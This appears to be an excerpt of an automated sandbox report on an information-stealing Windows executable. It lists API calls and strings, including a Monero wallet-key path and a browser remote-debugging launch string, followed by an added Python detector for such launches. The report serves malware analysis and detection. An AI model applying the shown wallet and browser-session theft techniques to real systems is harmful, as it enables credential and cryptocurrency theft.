                                    • Instruction ID: c09a2a34c15fc0e1327127c85ae158c9a522b4776166f1871f885b0426f0bc6e
                                    • Opcode Fuzzy Hash: 664a3c704ddf77a0eab3f0d8651398a63ad2491a91533efacb4a5612560b3ac2
                                    • Instruction Fuzzy Hash: C5312E70E04148ABCB04FBF2DC56BBE77F9AF24340F1049A9F11266292EF707909C662

                                    Control-flow Graph

                                    [Control-flow graph image not recoverable from the page; basic blocks span bd1220-bd129d and call GlobalMemoryStatusEx and ExitProcess]
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BD123E
                                    • __aulldiv.LIBCMT ref: 00BD1258
                                    • __aulldiv.LIBCMT ref: 00BD1266
                                    • ExitProcess.KERNEL32 ref: 00BD1294
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: 451b0d8a364d423232dcdd28f5f8d6b5c41bcf1f34960f48a9855a34cf0a5413
                                    • Instruction ID: aad073a306c94700c25b3c12ea091e2be50cf4d97855caeedf473f617da47514
                                    • Opcode Fuzzy Hash: 451b0d8a364d423232dcdd28f5f8d6b5c41bcf1f34960f48a9855a34cf0a5413
                                    • Instruction Fuzzy Hash: AD0112B0D44308FADF10DFE5CC4AB9DB7F8EB14705F208499E604B62C0D7B555458759

                                    Control-flow Graph

                                    [Control-flow graph image not recoverable from the page; basic blocks span be6d5a-be6dc2 and call OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess]
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE6D99
                                    • Sleep.KERNEL32(00001770), ref: 00BE6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6DBA
                                    • ExitProcess.KERNEL32 ref: 00BE6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 045d69502f850d514f168561cabf9217102e68fda3d4319ad71e78f74c4edf8c
                                    • Instruction ID: 991abbd5afc2e5ae6af01b4fd9bc8f729dc5e305281f45c5c4e5c5d4c9db8aea
                                    • Opcode Fuzzy Hash: 045d69502f850d514f168561cabf9217102e68fda3d4319ad71e78f74c4edf8c
                                    • Instruction Fuzzy Hash: 79F05E30B48249EFEB10EBA2DC4ABBD33F4EF28781F5085A5B512A51A1CBB06504CA61

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 7e68c91ed1019a2bb4c75bb944a397ff91afc3aa2f2d9112d999462b9db29d5b
                                    • Instruction ID: 303f64208304f86664818927a09a8081ed59b6ea1e355a03e60722143dbb41de
                                    • Opcode Fuzzy Hash: 7e68c91ed1019a2bb4c75bb944a397ff91afc3aa2f2d9112d999462b9db29d5b
                                    • Instruction Fuzzy Hash: 35213EB1D00209ABDF14DFA5EC45ADE7BB9FB45320F108665F915A7280EB706A09CF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD62D0: InternetOpenA.WININET(00BF0DFF,00000001,00000000,00000000,00000000), ref: 00BD6331
                                      • Part of subcall function 00BD62D0: StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6353
                                      • Part of subcall function 00BD62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6385
                                      • Part of subcall function 00BD62D0: HttpOpenRequestA.WININET(00000000,GET,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD63D5
                                      • Part of subcall function 00BD62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BD640F
                                      • Part of subcall function 00BD62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD6421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: fcf85e5c14f5e877af0ab28db81788aace54a00bdcec0ad53fd9ff4adfabe05f
                                    • Instruction ID: 777a0b7adecfb8e1f962ab1c1c5efe216a693d2c12ee504746edcbcee2a991e7
                                    • Opcode Fuzzy Hash: fcf85e5c14f5e877af0ab28db81788aace54a00bdcec0ad53fd9ff4adfabe05f
                                    • Instruction Fuzzy Hash: 3411E230900148AADB14FFB5DD92AED77BD9F50340F4145E4E51A57592EF30BB08CA51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00BE7ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: f1ca64bb06b0249e77d71fa132a0f1725ad5a1f2db925b2d58712817b0fef152
                                    • Instruction ID: e7e9d8e939867dbdea15f84121c0b34e9e1d6f980b3597dc8d6748d0dac4e080
                                    • Opcode Fuzzy Hash: f1ca64bb06b0249e77d71fa132a0f1725ad5a1f2db925b2d58712817b0fef152
                                    • Instruction Fuzzy Hash: C101D6B1A48249AFC700CF9ADC85FAEBBF8F705710F100169F605E3290D7B45A0487A1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BD112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BD1132
                                    • ExitProcess.KERNEL32 ref: 00BD1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: efeab70414bbab97334714fd9d5aefa66fe85721ca0b91a837ae7ca5cc8666a8
                                    • Instruction ID: 395a25a10d48f305f56e3363bbef0aae1c0a73df93c2c03ae683c08b8d78f381
                                    • Opcode Fuzzy Hash: efeab70414bbab97334714fd9d5aefa66fe85721ca0b91a837ae7ca5cc8666a8
                                    • Instruction Fuzzy Hash: 5FE08670A49308FFE710AB919C0AB0C7AA8DB09B01F100085F708761D0D6B435448658
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BD10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BD10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 3ed52f6b0fe1a6350586ce7c228a6263508781a32fee3d068a60db75e4ddfc7b
                                    • Instruction ID: 35d0469e6e5780493db565d05dad670bfe70579386e074129b24d63ce512af1e
                                    • Opcode Fuzzy Hash: 3ed52f6b0fe1a6350586ce7c228a6263508781a32fee3d068a60db75e4ddfc7b
                                    • Instruction Fuzzy Hash: 09F0E9B1641204BBE71496B99C59FAEB7D8E705704F300845F544E7280D571AE048AA0
                                    APIs
                                      • Part of subcall function 00BE7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7AA0
                                      • Part of subcall function 00BE7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7AA7
                                      • Part of subcall function 00BE7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BE7ABF
                                      • Part of subcall function 00BE79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BD11B7), ref: 00BE7A10
                                      • Part of subcall function 00BE79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7A17
                                      • Part of subcall function 00BE79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BE7A2F
                                    • ExitProcess.KERNEL32 ref: 00BD11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 2c59f5097bcb0dd4aacaf2b4bfe855128dc233377dfa16810c7abc25c3157073
                                    • Instruction ID: 7f019a0a922e21d3833257bd2270850c244530c8a10a769294cba789946c7436
                                    • Opcode Fuzzy Hash: 2c59f5097bcb0dd4aacaf2b4bfe855128dc233377dfa16810c7abc25c3157073
                                    • Instruction Fuzzy Hash: A9E012A9E443416BCA10B7B77C07B1B72CC9B5930AF040895F908A2202FF25F8048165
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00BF0B32,00BF0B2F,00000000,?,?,?,00BF1450,00BF0B2E), ref: 00BDBEC5
                                    • StrCmpCA.SHLWAPI(?,00BF1454), ref: 00BDBF33
                                    • StrCmpCA.SHLWAPI(?,00BF1458), ref: 00BDBF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDC8A9
                                    • FindClose.KERNEL32(000000FF), ref: 00BDC8BB
                                    Strings
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BDC534
                                    • \Brave\Preferences, xrefs: 00BDC1C1
                                    • Brave, xrefs: 00BDC0E8
                                    • Google Chrome, xrefs: 00BDC6F8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BDC3B2
                                    • Preferences, xrefs: 00BDC104
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BDC495
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: acbf11a9e60c6c0d9a2ac2afbc1bb9d4e4ee300d9254a869976e1e43fe54fef4
                                    • Instruction ID: 1a6cd9b63250dca57935c5c26676a69d6015fa8ee3acee249a66037042bc3888
                                    • Opcode Fuzzy Hash: acbf11a9e60c6c0d9a2ac2afbc1bb9d4e4ee300d9254a869976e1e43fe54fef4
                                    • Instruction Fuzzy Hash: 22524D72A001489BCB14FB71DD92EEE77BDAF54300F4185E9B50A62191EF34AB48CF62
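The string block of this function (--remote-debugging-port=9229 --profile-directory=", Brave, Google Chrome, Preferences, \Brave\Preferences) is consistent with a stealer starting a Chromium-based browser with the DevTools remote-debugging port enabled on a chosen profile. The report shows only the strings, not the launch call or what is done with the port, so the following is an added detection example written for this page, not code from the sample or from Joe Sandbox. It runs over constructed process-creation records (the field names pid, ppid, image, parent_image and cmdline are hypothetical, not a real EDR schema) and flags a chrome.exe or brave.exe launch whose command line carries --remote-debugging-port when the parent is not the browser itself; msedge.exe is included as an assumption, it does not appear in the report.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Chromium-based browsers. Chrome and Brave come from the report's strings
# ("Google Chrome", "\Brave\Preferences"); msedge.exe is an assumption added here.
BROWSER_IMAGES = {"chrome.exe", "brave.exe", "msedge.exe"}

# The switch seen in the sample's strings. Any port value is matched; 9229 is only this sample's choice.
REMOTE_DEBUG_RE = re.compile(r"^--remote-debugging-port(?:=(\d+))?$", re.IGNORECASE)
PROFILE_RE = re.compile(r"^--profile-directory=(.*)$", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Constructed process-creation record (field names are hypothetical, not a real EDR schema)."""
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the creating process
    cmdline: str


@dataclass
class Finding:
    pid: int
    browser: str
    port: str
    profile: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace outside double quotes, dropping the quotes.
    Sufficient for Chromium switches such as --profile-directory="Profile 1"."""
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def detect_remote_debug_launch(events: Iterable[ProcessEvent]) -> List[Finding]:
    """Flag a browser started with DevTools remote debugging by something other than the browser itself."""
    findings: List[Finding] = []
    for ev in events:
        image = basename(ev.image)
        if image not in BROWSER_IMAGES:
            continue
        port: Optional[str] = None
        profile = ""
        for tok in tokenize(ev.cmdline)[1:]:      # skip argv[0]
            m = REMOTE_DEBUG_RE.match(tok)
            if m:
                port = m.group(1) or "(unspecified)"
            m = PROFILE_RE.match(tok)
            if m:
                profile = m.group(1)
        if port is None:
            continue
        # Processes the browser spawns for itself are not a launch; skipping them keeps one launch to one finding.
        if basename(ev.parent_image) == image:
            continue
        findings.append(Finding(ev.pid, image, port, profile, basename(ev.parent_image)))
    return findings


# Constructed sample events, modelled on the strings in the report; not taken from the analysis itself.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
BRAVE = r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
SAMPLE_EVENTS = [
    # Stealer-style launch: an unsigned binary starts Chrome with the debugging port on a chosen profile
    ProcessEvent(4120, 3988, CHROME, r"C:\Users\user\Desktop\file.exe",
                 f'"{CHROME}" --remote-debugging-port=9229 --profile-directory="Default"'),
    # Chrome's own child process: must not be reported a second time
    ProcessEvent(4188, 4120, CHROME, CHROME,
                 f'"{CHROME}" --type=utility --remote-debugging-port=9229 --profile-directory="Default"'),
    # Ordinary user launch from the shell: no debugging switch
    ProcessEvent(4200, 1234, BRAVE, r"C:\Windows\explorer.exe",
                 f'"{BRAVE}" --profile-directory="Profile 1"'),
]

if __name__ == "__main__":
    for f in detect_remote_debug_launch(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.browser} started by {f.parent_image} "
              f"with DevTools port {f.port} on profile {f.profile!r}")
```

Developer tooling (chromedriver, Puppeteer, editors with a browser debug launcher) also starts browsers with this switch, so in production the parent image should be checked against an allowlist rather than reported unconditionally; the parent being an executable in a user-writable location, as in the first constructed event, is the case worth escalating.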
                                    APIs
                                    • wsprintfA.USER32 ref: 00BE3B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE3B33
                                    • lstrcat.KERNEL32(?,?), ref: 00BE3B85
                                    • StrCmpCA.SHLWAPI(?,00BF0F58), ref: 00BE3B97
                                    • StrCmpCA.SHLWAPI(?,00BF0F5C), ref: 00BE3BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE3EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00BE3ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 2e3089ecff8ca9220811665230f60cb406a23391b9d1d557dc817a9322d1ca85
                                    • Instruction ID: 6df976efe0236f7b8590b3f0f0d7c24a7f263b3b22649f0a457d33b4d8b75a43
                                    • Opcode Fuzzy Hash: 2e3089ecff8ca9220811665230f60cb406a23391b9d1d557dc817a9322d1ca85
                                    • Instruction Fuzzy Hash: 6AA15471A002489FDB24DF65DC85FEA73F8AB59700F0445C8B64D97151EB74AB88CF61
                                    APIs
                                    • wsprintfA.USER32 ref: 00BE4B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE4B93
                                    • StrCmpCA.SHLWAPI(?,00BF0FC4), ref: 00BE4BC1
                                    • StrCmpCA.SHLWAPI(?,00BF0FC8), ref: 00BE4BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE4DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00BE4DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: c6449c54d453d8fbf8cc19ac00cd7758d883343fa9ae02b50ec825200e62f6fc
                                    • Instruction ID: a2d93017f16d495a0e9d1ee29803b27e6fba71209bcd24f08209329bb2b1aeab
                                    • Opcode Fuzzy Hash: c6449c54d453d8fbf8cc19ac00cd7758d883343fa9ae02b50ec825200e62f6fc
                                    • Instruction Fuzzy Hash: 85614A71910218AFCB20EFA5DD45FEA73BCAB59700F0085D8F64996151EB70AB88CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BE47D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE47D7
                                    • wsprintfA.USER32 ref: 00BE47F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE480D
                                    • StrCmpCA.SHLWAPI(?,00BF0FAC), ref: 00BE483B
                                    • StrCmpCA.SHLWAPI(?,00BF0FB0), ref: 00BE4851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE48DB
                                    • FindClose.KERNEL32(000000FF), ref: 00BE48F0
                                    • lstrcat.KERNEL32(?,018BE598), ref: 00BE4915
                                    • lstrcat.KERNEL32(?,018BD8F0), ref: 00BE4928
                                    • lstrlen.KERNEL32(?), ref: 00BE4935
                                    • lstrlen.KERNEL32(?), ref: 00BE4946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: a0427aafa2797cdb6e440c8fba3422ce825f45c7312ad660d37b3ec298cdd4d8
                                    • Instruction ID: 7d87e18d18e426d9e9a3de65fea1bca532a98946c8d20cecf8a28ed42aa2807f
                                    • Opcode Fuzzy Hash: a0427aafa2797cdb6e440c8fba3422ce825f45c7312ad660d37b3ec298cdd4d8
                                    • Instruction Fuzzy Hash: 67516AB15042189FC724EF71DC89FEE77BCAB59300F4045C8B649A6150EB74AB88CF51
                                    APIs
                                    • wsprintfA.USER32 ref: 00BE4113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE412A
                                    • StrCmpCA.SHLWAPI(?,00BF0F94), ref: 00BE4158
                                    • StrCmpCA.SHLWAPI(?,00BF0F98), ref: 00BE416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE42BC
                                    • FindClose.KERNEL32(000000FF), ref: 00BE42D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 0b03c0cf775d5ec52b2a5af56588d10700a0fd1bdea50f711d121113bf037487
                                    • Instruction ID: 795e7423492de8fb73ec7ecd4b29a58e28df14701d522b81b0f52afb164a5a6c
                                    • Opcode Fuzzy Hash: 0b03c0cf775d5ec52b2a5af56588d10700a0fd1bdea50f711d121113bf037487
                                    • Instruction Fuzzy Hash: 56516DB1904118AFCB24EBB1DC85FEE77BCBB59300F4046D9B649A6050EB75AB89CF50
                                    APIs
                                    • wsprintfA.USER32 ref: 00BDEE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BDEE55
                                    • StrCmpCA.SHLWAPI(?,00BF1630), ref: 00BDEEAB
                                    • StrCmpCA.SHLWAPI(?,00BF1634), ref: 00BDEEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDF3AE
                                    • FindClose.KERNEL32(000000FF), ref: 00BDF3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
